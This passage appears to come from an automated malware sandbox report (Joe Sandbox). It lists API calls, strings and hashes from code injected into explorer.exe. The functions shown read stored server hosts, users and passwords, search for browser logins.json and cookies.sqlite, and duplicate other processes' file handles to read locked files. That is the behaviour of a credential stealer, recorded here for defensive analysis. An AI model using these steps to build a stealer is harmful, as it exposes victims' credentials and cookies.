                                                                                                                                                      • Part of subcall function 001219E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2,PortNumber,00000000,00000000), ref: 00121A1E
                                                                                                                                                      • Part of subcall function 001219E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121A3C
                                                                                                                                                      • Part of subcall function 001219E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121A75
                                                                                                                                                      • Part of subcall function 001219E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2,PortNumber,00000000,00000000), ref: 00121A98
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00121B40
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                    • API String ID: 2162223993-2036018995
                                                                                                                                                    • Opcode ID: a960fe268025078f398052045cbfb3f1af362e127e98ff2ea0434d821d554c51
                                                                                                                                                    • Instruction ID: 9021008e45ab3459b33598bab652faee6954ba9c1a9b4480b6ad4aecf7016607
                                                                                                                                                    • Opcode Fuzzy Hash: a960fe268025078f398052045cbfb3f1af362e127e98ff2ea0434d821d554c51
                                                                                                                                                    • Instruction Fuzzy Hash: E8F0E9277006A83BD611AA2AEC84D7B36BECBF13AA3160029F41D97245EF126C915274
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(02710000,00000000,?), ref: 00129EB5
                                                                                                                                                    Strings
                                                                                                                                                    • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00129ECD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                                    • API String ID: 1279760036-667713680
                                                                                                                                                    • Opcode ID: 3d5a9280354c7e9ac5aab46d8eba2266eb757c4315ac02c2325a8bbb21e75291
                                                                                                                                                    • Instruction ID: 9cf49d276134ad51e030f51a7772196f7d02281ff2a6a03797e2f38527999b01
                                                                                                                                                    • Opcode Fuzzy Hash: 3d5a9280354c7e9ac5aab46d8eba2266eb757c4315ac02c2325a8bbb21e75291
                                                                                                                                                    • Instruction Fuzzy Hash: BBE0C2376082207BC2132788BC05F6FB76CDBA4F10F014015FA04A3AA0C7309D5287A2
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121B82
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00121B8F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3498533004-0
                                                                                                                                                    • Opcode ID: 2a2a8cad3848b09691b7c5a2d4bb2cbe75e3da0e5d22d5f16f5fea1df3009cfc
                                                                                                                                                    • Instruction ID: f9a4858d9abd3440f7b048c715a2d36569a44837d26cf25bcba249204a525e8b
                                                                                                                                                    • Opcode Fuzzy Hash: 2a2a8cad3848b09691b7c5a2d4bb2cbe75e3da0e5d22d5f16f5fea1df3009cfc
                                                                                                                                                    • Instruction Fuzzy Hash: 50D017B1253A3072E5B5AB357C0CEA76E3DDF07AB5B040614B41DD54D0E3248CD786E0
                                                                                                                                                    APIs
                                                                                                                                                    • HeapFree.KERNEL32(02710000,00000000,?), ref: 00129EF8
                                                                                                                                                    Strings
                                                                                                                                                    • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00129F0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                                    • API String ID: 3298025750-4030396798
                                                                                                                                                    • Opcode ID: 5392c09a5d65b36b18e495d233d279fad1176267af3498819e97b19f04300e9c
                                                                                                                                                    • Instruction ID: 8638513321ea7db594f749cd94711f9b4fd9e650584016de51fa424e23a84de7
                                                                                                                                                    • Opcode Fuzzy Hash: 5392c09a5d65b36b18e495d233d279fad1176267af3498819e97b19f04300e9c
                                                                                                                                                    • Instruction Fuzzy Hash: 92D0C27310C3007BC3011B54EC01F2B7B3CAFA5B00F040008F104924A5C37054A1AB21
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                    • Opcode ID: d8d3747953ee54d21e93ec1296e75c01128e000dd76c3769f07b1d801e95ec36
                                                                                                                                                    • Instruction ID: a1e249c7037d9b01713def8d546b53385e1ab5bca549a283b3808f3ce0562c6e
                                                                                                                                                    • Opcode Fuzzy Hash: d8d3747953ee54d21e93ec1296e75c01128e000dd76c3769f07b1d801e95ec36
                                                                                                                                                    • Instruction Fuzzy Hash: 98A002755505045BDD4457A49E0DA1A3A38F7C4702F504554714986451DD6454C48721
                                                                                                                                                    APIs
                                                                                                                                                    • RtlZeroMemory.NTDLL(?,00000018), ref: 001212B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryZero
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 816449071-0
                                                                                                                                                    • Opcode ID: 6125f591f176d1f802ac4bfac213e4443455d4045ba49022b246d9e5c1912b05
                                                                                                                                                    • Instruction ID: 27ba6132a7849d700dc07a8c1f60111e9e909b00e793b56d9ca19d8962ee5371
                                                                                                                                                    • Opcode Fuzzy Hash: 6125f591f176d1f802ac4bfac213e4443455d4045ba49022b246d9e5c1912b05
                                                                                                                                                    • Instruction Fuzzy Hash: CA11F8B1A01219AFDB20DFA5E988AAEB7FDFB58351B104029F949E3240D730DD84CB60
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesExW.KERNELBASE(00000000,00000000,?,?,00000000,-00080006), ref: 0012B848
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 5a049e3d4868bd484f16d9b72ff9cd3b33bbde7cd448f4a90f0be1766015d191
                                                                                                                                                    • Instruction ID: 06a12929f770485bc7c4d44d80bb0dc6d31ef142e032139057eea0102eaa8fb0
                                                                                                                                                    • Opcode Fuzzy Hash: 5a049e3d4868bd484f16d9b72ff9cd3b33bbde7cd448f4a90f0be1766015d191
                                                                                                                                                    • Instruction Fuzzy Hash: 8BF09C31A0822C9AD7149ABDBC84AEAF7ACDF49754F004125E955E2090E3704D2547D1
                                                                                                                                                    APIs
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00121684
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateGlobalStream
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2244384528-0
                                                                                                                                                    • Opcode ID: f3d9ddcdef5eaeed2614d83be1f0f9b9fe4c2640473f698fb9944c09d618cd74
                                                                                                                                                    • Instruction ID: 897936178be9393e0164b0bb43a7c61a44e23e8f4cba8d046252ee9bf6007faa
                                                                                                                                                    • Opcode Fuzzy Hash: f3d9ddcdef5eaeed2614d83be1f0f9b9fe4c2640473f698fb9944c09d618cd74
                                                                                                                                                    • Instruction Fuzzy Hash: CBC08C30160232EFE7701B309C09B8A36E4AF297B2F070929F4C59D0C0E6F508C0CA90
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0012158A), ref: 00121056
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 84b6cf383a23aa3d68e6de86f2cce2894c2013998eca807e254dc7cb79966b3f
                                                                                                                                                    • Instruction ID: 67a01a4ab1015e191de99f1a4f258a7b20cf1df63400e263ea65b6fac3fae834
                                                                                                                                                    • Opcode Fuzzy Hash: 84b6cf383a23aa3d68e6de86f2cce2894c2013998eca807e254dc7cb79966b3f
                                                                                                                                                    • Instruction Fuzzy Hash: 8FA002F07D57007AFD695762AE1FF1529389740F02F100244B30D7C4D055E87584852D
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00124A5B,?,?,00000000,?,?,?,?,00124B66,?), ref: 00121065
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                    • Opcode ID: de27577285e0f8fa5b337c909b367f61b4a6db62f4090049cd6aeea53c03c5f6
                                                                                                                                                    • Instruction ID: 7d5936a23ede11832633d1160d489de6b899c149b991fe6bd0f57a7efbb1ad00
                                                                                                                                                    • Opcode Fuzzy Hash: de27577285e0f8fa5b337c909b367f61b4a6db62f4090049cd6aeea53c03c5f6
                                                                                                                                                    • Instruction Fuzzy Hash: 0AA00270690B0066EDB457205D0EF052A246780B01F6045447245A98D149A5E0C48A18
                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(001762B0,00000000,00000001,001762A0,?), ref: 0012445F
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 001244AA
                                                                                                                                                    • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0012456E
                                                                                                                                                    • lstrcmpiW.KERNEL32(Servers,?), ref: 0012457D
                                                                                                                                                    • lstrcmpiW.KERNEL32(Settings,?), ref: 0012458C
                                                                                                                                                      • Part of subcall function 001211E1: lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,001246E3), ref: 001211ED
                                                                                                                                                      • Part of subcall function 001211E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0012120F
                                                                                                                                                      • Part of subcall function 001211E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00121231
                                                                                                                                                    • lstrcmpiW.KERNEL32(Server,?), ref: 001245BE
                                                                                                                                                    • lstrcmpiW.KERNEL32(LastServer,?), ref: 001245CD
                                                                                                                                                    • lstrcmpiW.KERNEL32(Host,?), ref: 00124657
                                                                                                                                                    • lstrcmpiW.KERNEL32(Port,?), ref: 00124679
                                                                                                                                                    • lstrcmpiW.KERNEL32(User,?), ref: 0012469F
                                                                                                                                                    • lstrcmpiW.KERNEL32(Pass,?), ref: 001246C5
                                                                                                                                                    • wsprintfW.USER32 ref: 0012471E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                                    • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                                    • API String ID: 2230072276-1234691226
                                                                                                                                                    • Opcode ID: b9839a9cf6943e59f487d9195d4f8c26b90071c7480c266fa942e764792e8926
                                                                                                                                                    • Instruction ID: fe699c55de698eb184ad29670d68d5e94126182757d046811f88fde8466f97ac
                                                                                                                                                    • Opcode Fuzzy Hash: b9839a9cf6943e59f487d9195d4f8c26b90071c7480c266fa942e764792e8926
                                                                                                                                                    • Instruction Fuzzy Hash: 8DB12471204312AFD700DF64D884E6AB7F9EFC9745F00896CF5998B260DB71E85ACB62
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 001234C0
                                                                                                                                                      • Part of subcall function 001233C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00123401
                                                                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,001237A8), ref: 001234E9
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0012351E
                                                                                                                                                    • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00123541
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00123586
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0012358F
                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,File), ref: 001235B6
                                                                                                                                                    • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 001235DE
                                                                                                                                                    • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 001235F6
                                                                                                                                                    • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00123606
                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0012361E
                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 00123631
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00123658
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0012366B
                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00123681
                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 001236AD
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001236C0
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001236F5
                                                                                                                                                      • Part of subcall function 00121C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00121CC0
                                                                                                                                                      • Part of subcall function 00121C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00121CDA
                                                                                                                                                      • Part of subcall function 00121C9F: CloseHandle.KERNEL32(00000000), ref: 00121CE6
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00123707
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                                    • String ID: File
                                                                                                                                                    • API String ID: 3915112439-749574446
                                                                                                                                                    • Opcode ID: 92f4e4829c9e0e7d27928ed16dd16ed8fb8d7b53499c4ac80161e10463ad38c3
                                                                                                                                                    • Instruction ID: 0c9966463d3a063a551b6ed9d743881121033ae64ee6c0d503b63f7333022bc8
                                                                                                                                                    • Opcode Fuzzy Hash: 92f4e4829c9e0e7d27928ed16dd16ed8fb8d7b53499c4ac80161e10463ad38c3
                                                                                                                                                    • Instruction Fuzzy Hash: ED61A170204311BFD710AF21EC48F2B7BF9EB94754F00092CF95A962A1D739DA958B55
                                                                                                                                                    APIs
                                                                                                                                                    • memcmp.NTDLL ref: 00174502
                                                                                                                                                    • memcmp.NTDLL ref: 0017475F
                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00174803
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                    • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                    • API String ID: 231171946-1096842476
                                                                                                                                                    • Opcode ID: e66ec99cf7dc033d6b29ab74ff19294c33f1614f0875e6b8b9807ae804dd46aa
                                                                                                                                                    • Instruction ID: 4d94b57056ef907bf43c67bca0035abf13e37ebc839f2d45c4efd0d42e3a27d0
                                                                                                                                                    • Opcode Fuzzy Hash: e66ec99cf7dc033d6b29ab74ff19294c33f1614f0875e6b8b9807ae804dd46aa
                                                                                                                                                    • Instruction Fuzzy Hash: A3C10270A083918BDB38CE28849073AB7F1AB9A314F15852EF4DE87292D734D945CB86
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00122F0C), ref: 00121973
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(00176564,?,?,00122F0C), ref: 00121978
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,?), ref: 00121990
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,00176564), ref: 00121994
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 00122B3D
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,001762CC), ref: 00122B63
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,001762D0), ref: 00122B7B
                                                                                                                                                      • Part of subcall function 001219B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00122CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 001219C4
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00122BE7
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00122C16
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00122C43
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00122C52
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                                    • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                                    • API String ID: 1108783765-3717368146
                                                                                                                                                    • Opcode ID: 5b3bfa3f99d59140938c15a777bb9f7eaf1ec1465daf6d990c28e44227ac04c2
                                                                                                                                                    • Instruction ID: 8401d6d2ad77fcc9502391926b08019eaaf8ba59e3e74ff3fd91c0d408c911b3
                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bfa3f99d59140938c15a777bb9f7eaf1ec1465daf6d990c28e44227ac04c2
                                                                                                                                                    • Instruction Fuzzy Hash: 603184303047257BCB14EB70B85993F73EAABE4704B04492DF849D3282EB79CDA59652
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,$-x0$Inf$NaN
                                                                                                                                                    • API String ID: 0-2346028406
                                                                                                                                                    • Opcode ID: 46b1b42c4b67772552d4441cd62993af4149069f1b702c1b8f8e1a9887d147c7
                                                                                                                                                    • Instruction ID: 91806d8bae3bc27e61939f81bab72dd5e49acc9a97e38397b4939b893c4edbbc
                                                                                                                                                    • Opcode Fuzzy Hash: 46b1b42c4b67772552d4441cd62993af4149069f1b702c1b8f8e1a9887d147c7
                                                                                                                                                    • Instruction Fuzzy Hash: A3621671A0C3A18BD729CF28E49036BBFE1AF96304F29495DF4C5933D1E761C9658B82
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00126AAA: memset.NTDLL ref: 00126AC5
                                                                                                                                                    • memset.NTDLL ref: 00145F53
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                                    • API String ID: 2221118986-594550510
                                                                                                                                                    • Opcode ID: effc8723dd7ccb4450f3183af0c045f921e460c6c6fa2cbd4447aae116dae6b9
                                                                                                                                                    • Instruction ID: 555e6b57cf0a322c189fd5bbde013ccffef5f696896b3e6b60f93c2db97796d5
                                                                                                                                                    • Opcode Fuzzy Hash: effc8723dd7ccb4450f3183af0c045f921e460c6c6fa2cbd4447aae116dae6b9
                                                                                                                                                    • Instruction Fuzzy Hash: D3C19D70604702AFCB14DF24C480A2EB7E2BFD9708F14892DF85997292DB71DD56CB92
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00122127
                                                                                                                                                    • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0012213A
                                                                                                                                                    • wsprintfA.USER32 ref: 0012214F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                                                    • String ID: %li
                                                                                                                                                    • API String ID: 4120667308-1021419598
                                                                                                                                                    • Opcode ID: 3674ae74c393ffff8c723bc9dd04b86530a6f49bbd8394942a19e3b44226637c
                                                                                                                                                    • Instruction ID: 15c270869f3f6dbcffe7ca1ea38ffa320a41359255d68b77882f29eb2a239fab
                                                                                                                                                    • Opcode Fuzzy Hash: 3674ae74c393ffff8c723bc9dd04b86530a6f49bbd8394942a19e3b44226637c
                                                                                                                                                    • Instruction Fuzzy Hash: 97E0D83264021877C7207BB8AC0AEEF7F7DDB40B55F404195F908E2586E6724AA493D5
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00123E4B,00000000), ref: 0012124A
                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00121268
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00121295
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 117552131-0
                                                                                                                                                    • Opcode ID: 9cd4c75a7e81a0d2ec0ac9206cb4e44ea6b28820854ca3260b0616448e42de94
                                                                                                                                                    • Instruction ID: 0a8b950a57f89bb33fbd3da4e2f4ec142a0cf9e04a6a32e1e737a9df8e46b1db
                                                                                                                                                    • Opcode Fuzzy Hash: 9cd4c75a7e81a0d2ec0ac9206cb4e44ea6b28820854ca3260b0616448e42de94
                                                                                                                                                    • Instruction Fuzzy Hash: A601ADB1200315BFE328CF25DC89FBBB7ACEB90691F10462EF505C2280EBA1DC458A70
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,001246E3), ref: 001211ED
                                                                                                                                                    • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0012120F
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00121231
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 117552131-0
                                                                                                                                                    • Opcode ID: a45632201d6c041be8ebe640bc76409ca1d1f5511963bd29dfba0108310254ce
